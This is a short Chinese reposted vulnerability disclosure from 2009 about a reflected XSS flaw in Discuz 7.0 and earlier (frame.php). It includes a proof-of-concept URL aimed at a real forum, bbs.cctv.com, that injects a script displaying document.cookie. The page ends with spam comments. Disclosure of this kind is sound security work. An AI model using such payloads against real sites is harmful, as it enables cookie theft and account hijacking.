黑基网 首页 学院 电脑技术 查看内容

Discuz7.0被爆0DAY

2009-5-28 04:31| 投稿: computer

摘要: 原文: Discuz <=7.0(frame.php) xss Vulnerability 前段时间做风险评估的时候发现的,这个xss 需要在开启了左右分栏的情况下才可以触发。 ...
原文: Discuz <=7.0(frame.php) xss Vulnerability 前段时间做风险评估的时候发现的,这个xss 需要在开启了左右分栏的情况下才可以触发。 PoC: 程序代码 http://bbs.cctv.com/index.php?gid=24″></iframe><script>alert(document.cookie)</script> —–>   跳转到了 程序代码 http://bbs.cctv.com/frame.php?frameon=yes&referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 转帖自: http://www.patching.net/
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

发表评论

最新评论

引用 游客 2017-11-30 14:44
CZw9Ou  <a href="http://ljdhzvpqlcbx.com/">ljdhzvpqlcbx</a>, [url=http://gdorgozmoddw.com/]gdorgozmoddw[/url], [link=http://efafounbqewp.com/]efafounbqewp[/link], http://ngwdxtbfawuv.com/
引用 游客 2017-11-28 23:16
772Mjj http://www.LnAJ7K8QSpfMO2wQ8gO.com

查看全部评论(2)


新出炉

返回顶部